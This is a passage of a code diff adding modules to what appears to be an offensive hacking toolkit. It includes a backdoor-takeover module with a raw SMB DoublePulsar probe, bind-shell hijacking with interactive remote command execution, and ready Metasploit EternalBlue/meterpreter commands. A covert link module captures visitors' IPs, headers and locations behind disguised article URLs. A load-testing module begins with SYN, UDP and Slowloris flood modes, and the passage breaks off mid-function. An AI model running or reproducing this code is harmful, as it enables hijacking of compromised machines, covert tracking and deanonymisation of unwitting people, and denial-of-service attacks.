(STATUS_NOT_IMPLEMENTED + MID manipulation). + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + sock.connect((host, 445)) + + # SMB negotiate + negotiate = ( + b'\x00\x00\x00\x85' # NetBIOS + b'\xff\x53\x4d\x42' # SMB + b'\x72' # Negotiate + b'\x00\x00\x00\x00' # Status + b'\x18\x53\xc0' # Flags + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + b'\x00\x00\xff\xff\xff\xfe\x00\x00' + b'\x00\x00\x00\x00\x00\x62\x00' + b'\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b' + b'\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e' + b'\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e' + b'\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20' + b'\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f' + b'\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c' + b'\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c' + b'\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e' + b'\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00' + ) + sock.send(negotiate) + sock.recv(1024) + + # SMB Trans2 SESSION_SETUP (DoublePulsar detection probe) + trans2 = ( + b'\x00\x00\x00\x4e' # NetBIOS + b'\xff\x53\x4d\x42' # SMB header + b'\x32' # Trans2 + b'\x00\x00\x00\x00' # Status + b'\x18\x07\xc0' # Flags + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + b'\x00\x00\x00\x00\xff\xfe\x00\x08' # MID=0x0800 + b'\x00\x00\x0f\x0c\x00\x00\x00\x01' + b'\x00\x00\x00\x00\x00\x00\x00' + b'\xa6\xd9\xa4\x00\x00\x00\x00\x00' + b'\x00\x0e\x00\x00\x00\x0c\x00\x42\x00' + b'\x00\x00\x00\x00\x01\x00\x0e\x00' + b'\x00\x00\x0c\x00\x00\x00\x00\x00' + ) + sock.send(trans2) + resp = sock.recv(1024) + sock.close() + + if len(resp) >= 36: + # Check multiplex ID — DoublePulsar modifies it + mid = struct.unpack(' Optional[dict]: + """Use nmap for comprehensive scan if available.""" + nmap = find_tool('nmap') + if not nmap: + return None + try: + port_str = ','.join(str(p) for p in sorted(ports)) + cmd = [nmap, '-Pn', '-sV', '-O', '--version-intensity', '5', + '-p', port_str, '-oN', '-', host] + result = subprocess.run(cmd, capture_output=True, text=True, + timeout=120) + output = result.stdout + parsed_ports = [] + os_guess = '' + + for line in output.splitlines(): + # Parse port lines: "445/tcp open microsoft-ds" + if '/tcp' in line or '/udp' in line: + parts = line.split() + if len(parts) >= 3: + port_proto = parts[0].split('/') + if len(port_proto) == 2 and parts[1] == 'open': + parsed_ports.append(PortResult( + port=int(port_proto[0]), + protocol=port_proto[1], + state='open', + service=' '.join(parts[2:]), + )) + if 'OS details:' in line: + os_guess = line.split('OS details:')[1].strip() + elif 'Running:' in line: + os_guess = os_guess or line.split('Running:')[1].strip() + + return { + 'ports': parsed_ports, + 'os': os_guess, + 'raw': output, + } + except Exception: + return None + + # ── Takeover Methods ────────────────────────────────────────────────── + + def connect_raw_shell(self, host: str, port: int, + timeout: float = 5.0) -> dict: + """Connect to a raw bind shell (netcat-style).""" + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + sock.connect((host, port)) + # Try to get initial output + try: + sock.settimeout(2.0) + initial = sock.recv(4096).decode('utf-8', errors='replace') + except Exception: + initial = '' + session_id = f'shell_{host}_{port}_{int(time.time())}' + self._active_sessions[session_id] = { + 'type': 'raw_shell', + 'host': host, + 'port': port, + 'socket': sock, + 'connected_at': datetime.now(timezone.utc).isoformat(), + } + return { + 'ok': True, + 'session_id': session_id, + 'initial_output': initial, + 'message': f'Connected to bind shell at {host}:{port}', + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def shell_execute(self, session_id: str, command: str, + timeout: float = 10.0) -> dict: + """Execute a command on an active shell session.""" + session = self._active_sessions.get(session_id) + if not session: + return {'ok': False, 'error': 'Session not found'} + sock = session.get('socket') + if not sock: + return {'ok': False, 'error': 'No socket for session'} + try: + sock.settimeout(timeout) + sock.send((command + '\n').encode()) + time.sleep(0.5) + output = b'' + sock.settimeout(2.0) + while True: + try: + chunk = sock.recv(4096) + if not chunk: + break + output += chunk + except socket.timeout: + break + return { + 'ok': True, + 'output': output.decode('utf-8', errors='replace'), + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def close_session(self, session_id: str) -> dict: + """Close an active session.""" + session = self._active_sessions.pop(session_id, None) + if not session: + return {'ok': False, 'error': 'Session not found'} + sock = session.get('socket') + if sock: + try: + sock.close() + except Exception: + pass + return {'ok': True, 'message': 'Session closed'} + + def list_sessions(self) -> List[dict]: + """List active takeover sessions.""" + return [ + { + 'session_id': sid, + 'type': s['type'], + 'host': s['host'], + 'port': s['port'], + 'connected_at': s['connected_at'], + } + for sid, s in self._active_sessions.items() + ] + + def attempt_takeover(self, host: str, backdoor: dict) -> dict: + """Attempt to take over a detected backdoor. + + Routes to the appropriate takeover method based on the signature. + """ + method = backdoor.get('takeover_method', '') + port = backdoor.get('port', 0) + + if method == 'raw_shell': + return self.connect_raw_shell(host, port) + + if method == 'meterpreter_connect': + return self._takeover_via_msf(host, port, 'meterpreter') + + if method == 'meterpreter_session': + return self._takeover_via_msf(host, port, 'meterpreter') + + if method == 'doublepulsar_inject': + return self._takeover_doublepulsar(host) + + if method == 'ssh_connect': + return {'ok': False, + 'message': f'SSH detected on {host}:{port}. ' + 'Use Offense → Reverse Shell for SSH access, ' + 'or try default credentials.'} + + if method == 'webshell_detect': + return self._detect_webshell(host, port) + + if method == 'socks_connect': + return {'ok': True, + 'message': f'SOCKS proxy at {host}:{port}. ' + f'Configure proxychains: socks5 {host} {port}'} + + if method == 'http_proxy_use': + return {'ok': True, + 'message': f'HTTP proxy at {host}:{port}. ' + f'export http_proxy=http://{host}:{port}'} + + if method == 'generic_connect': + return self.connect_raw_shell(host, port) + + return {'ok': False, 'error': f'No takeover handler for method: {method}'} + + def _takeover_via_msf(self, host: str, port: int, payload_type: str) -> dict: + """Attempt takeover using Metasploit if available.""" + try: + from core.msf_interface import get_msf_interface + msf = get_msf_interface() + if not msf.is_connected: + return {'ok': False, + 'error': 'Metasploit not connected. Connect via Offense page first.'} + # Use multi/handler to connect to bind shell + return { + 'ok': True, + 'message': f'Metasploit available. Create handler: ' + f'use exploit/multi/handler; ' + f'set PAYLOAD windows/meterpreter/bind_tcp; ' + f'set RHOST {host}; set LPORT {port}; exploit', + 'msf_command': f'use exploit/multi/handler\n' + f'set PAYLOAD windows/meterpreter/bind_tcp\n' + f'set RHOST {host}\nset LPORT {port}\nexploit', + } + except ImportError: + return {'ok': False, 'error': 'Metasploit module not available'} + + def _takeover_doublepulsar(self, host: str) -> dict: + """Provide DoublePulsar exploitation guidance.""" + return { + 'ok': True, + 'message': f'DoublePulsar detected on {host}:445. Use Metasploit:\n' + f' use exploit/windows/smb/ms17_010_eternalblue\n' + f' set RHOSTS {host}\n' + f' set PAYLOAD windows/x64/meterpreter/reverse_tcp\n' + f' set LHOST \n' + f' exploit\n\n' + f'Or inject DLL via existing DoublePulsar implant:\n' + f' use exploit/windows/smb/ms17_010_psexec\n' + f' set RHOSTS {host}\n' + f' exploit', + 'msf_command': f'use exploit/windows/smb/ms17_010_eternalblue\n' + f'set RHOSTS {host}\n' + f'set PAYLOAD windows/x64/meterpreter/reverse_tcp\n' + f'exploit', + } + + def _detect_webshell(self, host: str, port: int) -> dict: + """Probe HTTP service for common web shells.""" + shells_found = [] + common_paths = [ + '/cmd.php', '/shell.php', '/c99.php', '/r57.php', + '/webshell.php', '/backdoor.php', '/upload.php', + '/cmd.asp', '/shell.asp', '/cmd.aspx', '/shell.aspx', + '/cmd.jsp', '/shell.jsp', + '/.hidden/shell.php', '/images/shell.php', + '/uploads/shell.php', '/tmp/shell.php', + '/wp-content/uploads/shell.php', + '/wp-includes/shell.php', + ] + try: + import requests as req + for path in common_paths: + try: + r = req.get(f'http://{host}:{port}{path}', timeout=3, + allow_redirects=False) + if r.status_code == 200 and len(r.text) > 0: + # Check if it looks like a shell + text = r.text.lower() + indicators = ['execute', 'command', 'shell', 'system(', + 'passthru', 'exec(', 'cmd', 'uname', + 'phpinfo', 'eval('] + if any(ind in text for ind in indicators): + shells_found.append({ + 'path': path, + 'size': len(r.text), + 'status': r.status_code, + }) + except Exception: + continue + except ImportError: + return {'ok': False, 'error': 'requests library not available for web shell detection'} + + if shells_found: + return { + 'ok': True, + 'message': f'Found {len(shells_found)} web shell(s) on {host}:{port}', + 'shells': shells_found, + } + return { + 'ok': True, + 'message': f'No common web shells found on {host}:{port}', + 'shells': [], + } + + # ── History ─────────────────────────────────────────────────────────── + + def get_scan_history(self) -> List[dict]: + return list(reversed(self._scans)) + + def clear_history(self) -> dict: + self._scans.clear() + self._save_scans() + return {'ok': True, 'message': 'Scan history cleared'} + + +# ── Singleton ───────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_hack_hijack() -> HackHijackService: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = HackHijackService() + return _instance + + +# ── CLI ─────────────────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for Hack Hijack.""" + svc = get_hack_hijack() + + while True: + print("\n╔═══════════════════════════════════════╗") + print("║ HACK HIJACK — Takeover ║") + print("╠═══════════════════════════════════════╣") + print("║ 1 — Quick Scan (backdoor ports) ║") + print("║ 2 — Full Scan (all suspicious) ║") + print("║ 3 — Nmap Deep Scan ║") + print("║ 4 — View Scan History ║") + print("║ 5 — Active Sessions ║") + print("║ 0 — Back ║") + print("╚═══════════════════════════════════════╝") + + choice = input("\n Select: ").strip() + + if choice == '0': + break + elif choice in ('1', '2', '3'): + target = input(" Target IP: ").strip() + if not target: + continue + scan_type = {'1': 'quick', '2': 'full', '3': 'nmap'}[choice] + print(f"\n Scanning {target} ({scan_type})...") + + def progress(current, total): + print(f" [{current}/{total}] ports scanned", end='\r') + + result = svc.scan_target(target, scan_type=scan_type, + progress_cb=progress) + print(f"\n Scan complete in {result.duration:.1f}s") + print(f" Open ports: {len(result.open_ports)}") + + if result.open_ports: + print("\n PORT STATE SERVICE BANNER") + print(" " + "-" * 60) + for p in result.open_ports: + banner = p.banner[:40] if p.banner else '' + print(f" {p.port:<9} {p.state:<7} {p.service:<10} {banner}") + + if result.backdoors: + print(f"\n BACKDOOR INDICATORS ({len(result.backdoors)}):") + print(" " + "-" * 60) + for i, bd in enumerate(result.backdoors, 1): + color = {'high': '\033[91m', 'medium': '\033[93m', + 'low': '\033[90m'}.get(bd.confidence, '') + reset = '\033[0m' + print(f" {i}. {color}[{bd.confidence.upper()}]{reset} " + f"{bd.signature} (port {bd.port})") + if bd.details: + print(f" {bd.details}") + + # Offer takeover + try: + sel = input("\n Attempt takeover? Enter # (0=skip): ").strip() + if sel and sel != '0': + idx = int(sel) - 1 + if 0 <= idx < len(result.backdoors): + bd = result.backdoors[idx] + bd_dict = { + 'port': bd.port, + 'takeover_method': bd.takeover_method, + } + r = svc.attempt_takeover(target, bd_dict) + if r.get('ok'): + print(f"\n {r.get('message', 'Success')}") + if r.get('session_id'): + print(f" Session: {r['session_id']}") + # Interactive shell + while True: + cmd = input(f" [{target}]$ ").strip() + if cmd in ('exit', 'quit', ''): + svc.close_session(r['session_id']) + break + out = svc.shell_execute(r['session_id'], cmd) + if out.get('ok'): + print(out.get('output', '')) + else: + print(f" Error: {out.get('error')}") + else: + print(f"\n Failed: {r.get('error', 'Unknown error')}") + except (ValueError, IndexError): + pass + + if result.smb_info.get('vulnerable'): + print("\n [!] SMB MS17-010 (EternalBlue) VULNERABLE") + print(f" OS: {result.smb_info.get('os', 'unknown')}") + print(f" Signing: {result.smb_info.get('signing', 'unknown')}") + + if result.os_guess: + print(f"\n OS Guess: {result.os_guess}") + + elif choice == '4': + history = svc.get_scan_history() + if not history: + print("\n No scan history.") + continue + print(f"\n Scan History ({len(history)} scans):") + for i, scan in enumerate(history[:20], 1): + bds = len(scan.get('backdoors', [])) + high = sum(1 for b in scan.get('backdoors', []) + if b.get('confidence') == 'high') + print(f" {i}. {scan['target']} — " + f"{len(scan.get('open_ports', []))} open, " + f"{bds} indicators ({high} high) — " + f"{scan['scan_time'][:19]}") + + elif choice == '5': + sessions = svc.list_sessions() + if not sessions: + print("\n No active sessions.") + continue + print(f"\n Active Sessions ({len(sessions)}):") + for s in sessions: + print(f" {s['session_id']} — {s['type']} → " + f"{s['host']}:{s['port']} " + f"(since {s['connected_at'][:19]})") diff --git a/modules/ipcapture.py b/modules/ipcapture.py new file mode 100644 index 0000000..86acbd8 --- /dev/null +++ b/modules/ipcapture.py @@ -0,0 +1,427 @@ +"""IP Capture & Redirect — stealthy link tracking for OSINT. + +Create disguised links that capture visitor IP + metadata, +then redirect to a legitimate target URL. Fast 302 redirect, +realistic URL paths, no suspicious indicators. +""" + +DESCRIPTION = "IP Capture & Redirect — stealthy link tracking" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "osint" + +import os +import json +import time +import random +import string +import hashlib +import threading +from datetime import datetime +from pathlib import Path +from typing import Dict, List, Optional + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Realistic URL path generation ──────────────────────────────────────────── + +_WORD_POOL = [ + 'tech', 'news', 'science', 'world', 'business', 'health', 'politics', + 'sports', 'culture', 'opinion', 'breaking', 'latest', 'update', 'report', + 'analysis', 'insight', 'review', 'guide', 'how-to', 'explained', + 'ai', 'climate', 'economy', 'security', 'research', 'innovation', + 'digital', 'global', 'local', 'industry', 'future', 'trends', + 'development', 'infrastructure', 'community', 'education', 'policy', +] + +_TITLE_PATTERNS = [ + '{adj}-{noun}-{verb}-{year}-{noun2}', + '{noun}-{adj}-{noun2}-{verb}', + 'new-{noun}-{verb}-{adj}-{noun2}', + '{noun}-report-{year}-{adj}-{noun2}', + 'how-{noun}-is-{verb}-the-{noun2}', + '{adj}-{noun}-breakthrough-{noun2}', +] + +_ADJECTIVES = [ + 'major', 'new', 'latest', 'critical', 'emerging', 'global', + 'innovative', 'surprising', 'important', 'unprecedented', +] + +_NOUNS = [ + 'technology', 'researchers', 'companies', 'governments', 'scientists', + 'industry', 'market', 'community', 'experts', 'development', +] + +_VERBS = [ + 'changing', 'transforming', 'disrupting', 'advancing', 'impacting', + 'reshaping', 'driving', 'revealing', 'challenging', 'accelerating', +] + + +def _generate_article_path() -> str: + """Generate a realistic-looking article URL path.""" + now = datetime.now() + year = now.strftime('%Y') + month = now.strftime('%m') + + pattern = random.choice(_TITLE_PATTERNS) + slug = pattern.format( + adj=random.choice(_ADJECTIVES), + noun=random.choice(_NOUNS), + noun2=random.choice(_NOUNS), + verb=random.choice(_VERBS), + year=year, + ) + + # Article-style path + styles = [ + f'/article/{year}/{month}/{slug}', + f'/news/{year}/{slug}', + f'/stories/{slug}-{random.randint(1000, 9999)}', + f'/p/{slug}', + f'/read/{hashlib.md5(slug.encode()).hexdigest()[:8]}', + ] + return random.choice(styles) + + +def _generate_short_key(length: int = 8) -> str: + """Generate a short random key.""" + chars = string.ascii_lowercase + string.digits + return ''.join(random.choices(chars, k=length)) + + +# ── IP Capture Service ─────────────────────────────────────────────────────── + +class IPCaptureService: + """Manage capture links and record visitor metadata.""" + + def __init__(self): + self._file = os.path.join(get_data_dir(), 'osint_captures.json') + self._links = {} + self._lock = threading.Lock() + self._load() + + def _load(self): + if os.path.exists(self._file): + try: + with open(self._file, 'r') as f: + self._links = json.load(f) + except Exception: + self._links = {} + + def _save(self): + os.makedirs(os.path.dirname(self._file), exist_ok=True) + with open(self._file, 'w') as f: + json.dump(self._links, f, indent=2) + + def create_link(self, target_url: str, name: str = '', + disguise: str = 'article') -> dict: + """Create a new capture link. + + Args: + target_url: The legitimate URL to redirect to after capture. + name: Friendly name for this link. + disguise: URL style — 'short', 'article', or 'custom'. + + Returns: + Dict with key, paths, and full URLs. + """ + key = _generate_short_key() + + if disguise == 'article': + article_path = _generate_article_path() + elif disguise == 'short': + article_path = f'/c/{key}' + else: + article_path = f'/c/{key}' + + with self._lock: + self._links[key] = { + 'key': key, + 'name': name or f'Link {key}', + 'target_url': target_url, + 'disguise': disguise, + 'article_path': article_path, + 'short_path': f'/c/{key}', + 'created': datetime.now().isoformat(), + 'captures': [], + 'active': True, + } + self._save() + + return { + 'ok': True, + 'key': key, + 'short_path': f'/c/{key}', + 'article_path': article_path, + 'target_url': target_url, + } + + def get_link(self, key: str) -> Optional[dict]: + return self._links.get(key) + + def list_links(self) -> List[dict]: + return list(self._links.values()) + + def delete_link(self, key: str) -> bool: + with self._lock: + if key in self._links: + del self._links[key] + self._save() + return True + return False + + def find_by_path(self, path: str) -> Optional[dict]: + """Find a link by its article path.""" + for link in self._links.values(): + if link.get('article_path') == path: + return link + return None + + def record_capture(self, key: str, ip: str, user_agent: str = '', + accept_language: str = '', referer: str = '', + headers: dict = None) -> bool: + """Record a visitor capture.""" + with self._lock: + link = self._links.get(key) + if not link or not link.get('active'): + return False + + capture = { + 'ip': ip, + 'timestamp': datetime.now().isoformat(), + 'user_agent': user_agent, + 'accept_language': accept_language, + 'referer': referer, + } + + # Extract extra metadata from headers + if headers: + for h in ['X-Forwarded-For', 'CF-Connecting-IP', 'X-Real-IP']: + val = headers.get(h, '') + if val: + capture[f'header_{h.lower().replace("-","_")}'] = val + # Connection hints + for h in ['Sec-CH-UA', 'Sec-CH-UA-Platform', 'Sec-CH-UA-Mobile', + 'DNT', 'Upgrade-Insecure-Requests']: + val = headers.get(h, '') + if val: + capture[f'hint_{h.lower().replace("-","_")}'] = val + + # GeoIP lookup (best-effort) + try: + geo = self._geoip_lookup(ip) + if geo: + capture['geo'] = geo + except Exception: + pass + + link['captures'].append(capture) + self._save() + return True + + def _geoip_lookup(self, ip: str) -> Optional[dict]: + """Best-effort GeoIP lookup using the existing geoip module.""" + try: + from modules.geoip import GeoIPLookup + geo = GeoIPLookup() + result = geo.lookup(ip) + if result and result.get('success'): + return { + 'country': result.get('country', ''), + 'region': result.get('region', ''), + 'city': result.get('city', ''), + 'isp': result.get('isp', ''), + 'lat': result.get('latitude', ''), + 'lon': result.get('longitude', ''), + } + except Exception: + pass + return None + + def get_captures(self, key: str) -> List[dict]: + link = self._links.get(key) + return link.get('captures', []) if link else [] + + def get_stats(self, key: str) -> dict: + link = self._links.get(key) + if not link: + return {} + captures = link.get('captures', []) + unique_ips = set(c['ip'] for c in captures) + return { + 'total': len(captures), + 'unique_ips': len(unique_ips), + 'first': captures[0]['timestamp'] if captures else None, + 'last': captures[-1]['timestamp'] if captures else None, + } + + def export_captures(self, key: str, fmt: str = 'json') -> str: + """Export captures to JSON or CSV string.""" + captures = self.get_captures(key) + if fmt == 'csv': + if not captures: + return 'ip,timestamp,user_agent,country,city\n' + lines = ['ip,timestamp,user_agent,country,city'] + for c in captures: + geo = c.get('geo', {}) + lines.append(','.join([ + c.get('ip', ''), + c.get('timestamp', ''), + f'"{c.get("user_agent", "")}"', + geo.get('country', ''), + geo.get('city', ''), + ])) + return '\n'.join(lines) + return json.dumps(captures, indent=2) + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_ip_capture() -> IPCaptureService: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = IPCaptureService() + return _instance + + +# ── Interactive CLI ────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for IP Capture & Redirect.""" + service = get_ip_capture() + + while True: + print("\n" + "=" * 60) + print(" IP CAPTURE & REDIRECT") + print(" Stealthy link tracking for OSINT") + print("=" * 60) + links = service.list_links() + active = sum(1 for l in links if l.get('active')) + total_captures = sum(len(l.get('captures', [])) for l in links) + print(f" Active links: {active} | Total captures: {total_captures}") + print() + print(" 1 — Create Capture Link") + print(" 2 — List Active Links") + print(" 3 — View Captures") + print(" 4 — Delete Link") + print(" 5 — Export Captures") + print(" 0 — Back") + print() + + choice = input(" Select: ").strip() + + if choice == '0': + break + elif choice == '1': + _cli_create(service) + elif choice == '2': + _cli_list(service) + elif choice == '3': + _cli_view(service) + elif choice == '4': + _cli_delete(service) + elif choice == '5': + _cli_export(service) + + +def _cli_create(service: IPCaptureService): + """Create a new capture link.""" + print("\n--- Create Capture Link ---") + target = input(" Target URL (redirect destination): ").strip() + if not target: + print(" [!] URL required") + return + if not target.startswith(('http://', 'https://')): + target = 'https://' + target + + name = input(" Friendly name []: ").strip() + print(" Disguise type:") + print(" 1 — Article URL (realistic path)") + print(" 2 — Short URL (/c/xxxxx)") + dtype = input(" Select [1]: ").strip() or '1' + disguise = 'article' if dtype == '1' else 'short' + + result = service.create_link(target, name, disguise) + if result['ok']: + print(f"\n [+] Link created!") + print(f" Key: {result['key']}") + print(f" Short URL: {result['short_path']}") + print(f" Article URL: {result['article_path']}") + print(f" Redirects to: {result['target_url']}") + else: + print(f" [-] {result.get('error', 'Failed')}") + + +def _cli_list(service: IPCaptureService): + """List all active links.""" + links = service.list_links() + if not links: + print("\n No capture links") + return + print(f"\n--- Active Links ({len(links)}) ---") + for l in links: + stats = service.get_stats(l['key']) + active = "ACTIVE" if l.get('active') else "DISABLED" + print(f"\n [{l['key']}] {l.get('name', 'Unnamed')} — {active}") + print(f" Target: {l['target_url']}") + print(f" Short: {l['short_path']}") + print(f" Article: {l.get('article_path', 'N/A')}") + print(f" Captures: {stats.get('total', 0)} ({stats.get('unique_ips', 0)} unique)") + if stats.get('last'): + print(f" Last hit: {stats['last']}") + + +def _cli_view(service: IPCaptureService): + """View captures for a link.""" + key = input(" Link key: ").strip() + captures = service.get_captures(key) + if not captures: + print(" No captures for this link") + return + print(f"\n--- Captures ({len(captures)}) ---") + for c in captures: + geo = c.get('geo', {}) + location = f"{geo.get('city', '?')}, {geo.get('country', '?')}" if geo else 'Unknown' + print(f" {c['timestamp']} {c['ip']:>15} {location}") + if c.get('user_agent'): + ua = c['user_agent'][:80] + ('...' if len(c.get('user_agent', '')) > 80 else '') + print(f" UA: {ua}") + + +def _cli_delete(service: IPCaptureService): + """Delete a link.""" + key = input(" Link key to delete: ").strip() + if service.delete_link(key): + print(" [+] Link deleted") + else: + print(" [-] Link not found") + + +def _cli_export(service: IPCaptureService): + """Export captures.""" + key = input(" Link key: ").strip() + fmt = input(" Format (json/csv) [json]: ").strip() or 'json' + data = service.export_captures(key, fmt) + print(f"\n{data}") + + save = input("\n Save to file? [y/N]: ").strip().lower() + if save == 'y': + ext = 'csv' if fmt == 'csv' else 'json' + filepath = os.path.join(get_data_dir(), 'exports', f'captures_{key}.{ext}') + os.makedirs(os.path.dirname(filepath), exist_ok=True) + with open(filepath, 'w') as f: + f.write(data) + print(f" [+] Saved to {filepath}") diff --git a/modules/loadtest.py b/modules/loadtest.py new file mode 100644 index 0000000..b970e58 --- /dev/null +++ b/modules/loadtest.py @@ -0,0 +1,1097 @@ +"""AUTARCH Load Testing Module + +Multi-protocol load/stress testing tool combining features from +Apache Bench, Locust, k6, wrk, Slowloris, and HULK. + +Supports: HTTP/HTTPS GET/POST/PUT/DELETE, Slowloris, SYN flood, +UDP flood, TCP connect flood, with real-time metrics and ramp-up patterns. +""" + +DESCRIPTION = "Load & stress testing toolkit" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import time +import threading +import random +import string +import socket +import ssl +import struct +import queue +import json +import statistics +from dataclasses import dataclass, field +from typing import Dict, List, Optional, Any +from enum import Enum +from collections import deque +from urllib.parse import urlparse + +# Optional: requests for HTTP tests +try: + import requests + from requests.adapters import HTTPAdapter + REQUESTS_AVAILABLE = True +except ImportError: + REQUESTS_AVAILABLE = False + + +class AttackType(Enum): + HTTP_FLOOD = "http_flood" + HTTP_SLOWLORIS = "slowloris" + TCP_CONNECT = "tcp_connect" + UDP_FLOOD = "udp_flood" + SYN_FLOOD = "syn_flood" + + +class RampPattern(Enum): + CONSTANT = "constant" # All workers at once + LINEAR = "linear" # Gradually add workers + STEP = "step" # Add workers in bursts + SPIKE = "spike" # Burst → sustain → burst + + +@dataclass +class RequestResult: + status_code: int = 0 + latency_ms: float = 0.0 + bytes_sent: int = 0 + bytes_received: int = 0 + success: bool = False + error: str = "" + timestamp: float = 0.0 + + +@dataclass +class TestMetrics: + """Live metrics for a running load test.""" + total_requests: int = 0 + successful: int = 0 + failed: int = 0 + bytes_sent: int = 0 + bytes_received: int = 0 + start_time: float = 0.0 + elapsed: float = 0.0 + active_workers: int = 0 + status_codes: Dict[int, int] = field(default_factory=dict) + latencies: List[float] = field(default_factory=list) + errors: Dict[str, int] = field(default_factory=dict) + rps_history: List[float] = field(default_factory=list) + + @property + def rps(self) -> float: + if self.elapsed <= 0: + return 0.0 + return self.total_requests / self.elapsed + + @property + def avg_latency(self) -> float: + return statistics.mean(self.latencies) if self.latencies else 0.0 + + @property + def p50_latency(self) -> float: + if not self.latencies: + return 0.0 + s = sorted(self.latencies) + return s[len(s) // 2] + + @property + def p95_latency(self) -> float: + if not self.latencies: + return 0.0 + s = sorted(self.latencies) + return s[int(len(s) * 0.95)] + + @property + def p99_latency(self) -> float: + if not self.latencies: + return 0.0 + s = sorted(self.latencies) + return s[int(len(s) * 0.99)] + + @property + def max_latency(self) -> float: + return max(self.latencies) if self.latencies else 0.0 + + @property + def min_latency(self) -> float: + return min(self.latencies) if self.latencies else 0.0 + + @property + def success_rate(self) -> float: + if self.total_requests <= 0: + return 0.0 + return (self.successful / self.total_requests) * 100 + + @property + def error_rate(self) -> float: + if self.total_requests <= 0: + return 0.0 + return (self.failed / self.total_requests) * 100 + + def to_dict(self) -> dict: + return { + 'total_requests': self.total_requests, + 'successful': self.successful, + 'failed': self.failed, + 'bytes_sent': self.bytes_sent, + 'bytes_received': self.bytes_received, + 'elapsed': round(self.elapsed, 2), + 'active_workers': self.active_workers, + 'rps': round(self.rps, 1), + 'avg_latency': round(self.avg_latency, 2), + 'p50_latency': round(self.p50_latency, 2), + 'p95_latency': round(self.p95_latency, 2), + 'p99_latency': round(self.p99_latency, 2), + 'max_latency': round(self.max_latency, 2), + 'min_latency': round(self.min_latency, 2), + 'success_rate': round(self.success_rate, 1), + 'error_rate': round(self.error_rate, 1), + 'status_codes': dict(self.status_codes), + 'top_errors': dict(sorted(self.errors.items(), key=lambda x: -x[1])[:5]), + 'rps_history': list(self.rps_history[-60:]), + } + + +# User-agent rotation pool +USER_AGENTS = [ + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/605.1.15", + "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Edge/120.0.0.0", + "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148", + "Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 Chrome/120.0.0.0 Mobile Safari/537.36", + "curl/8.4.0", + "python-requests/2.31.0", +] + + +class LoadTester: + """Multi-protocol load testing engine.""" + + def __init__(self): + self._stop_event = threading.Event() + self._pause_event = threading.Event() + self._pause_event.set() # Not paused by default + self._workers: List[threading.Thread] = [] + self._metrics = TestMetrics() + self._metrics_lock = threading.Lock() + self._running = False + self._config: Dict[str, Any] = {} + self._result_queue: queue.Queue = queue.Queue() + self._subscribers: List[queue.Queue] = [] + self._rps_counter = 0 + self._rps_timer_start = 0.0 + + @property + def running(self) -> bool: + return self._running + + @property + def metrics(self) -> TestMetrics: + return self._metrics + + def start(self, config: Dict[str, Any]): + """Start a load test with given configuration. + + Config keys: + target: URL or host:port + attack_type: http_flood|slowloris|tcp_connect|udp_flood|syn_flood + workers: Number of concurrent workers + duration: Duration in seconds (0 = unlimited) + requests_per_worker: Max requests per worker (0 = unlimited) + ramp_pattern: constant|linear|step|spike + ramp_duration: Ramp-up time in seconds + method: HTTP method (GET/POST/PUT/DELETE) + headers: Custom headers dict + body: Request body + timeout: Request timeout in seconds + follow_redirects: Follow HTTP redirects + verify_ssl: Verify SSL certificates + rotate_useragent: Rotate user agents + custom_useragent: Custom user agent string + rate_limit: Max requests per second (0 = unlimited) + payload_size: UDP/TCP payload size in bytes + """ + if self._running: + return + + self._stop_event.clear() + self._pause_event.set() + self._running = True + self._config = config + self._metrics = TestMetrics(start_time=time.time()) + self._rps_counter = 0 + self._rps_timer_start = time.time() + + # Start metrics collector thread + collector = threading.Thread(target=self._collect_results, daemon=True) + collector.start() + + # Start RPS tracker + rps_tracker = threading.Thread(target=self._track_rps, daemon=True) + rps_tracker.start() + + # Determine attack type + attack_type = config.get('attack_type', 'http_flood') + workers = config.get('workers', 10) + ramp = config.get('ramp_pattern', 'constant') + ramp_dur = config.get('ramp_duration', 0) + + # Launch workers based on ramp pattern + launcher = threading.Thread( + target=self._launch_workers, + args=(attack_type, workers, ramp, ramp_dur), + daemon=True + ) + launcher.start() + + def stop(self): + """Stop the load test.""" + self._stop_event.set() + self._running = False + + def pause(self): + """Pause the load test.""" + self._pause_event.clear() + + def resume(self): + """Resume the load test.""" + self._pause_event.set() + + def subscribe(self) -> queue.Queue: + """Subscribe to real-time metric updates.""" + q = queue.Queue() + self._subscribers.append(q) + return q + + def unsubscribe(self, q: queue.Queue): + """Unsubscribe from 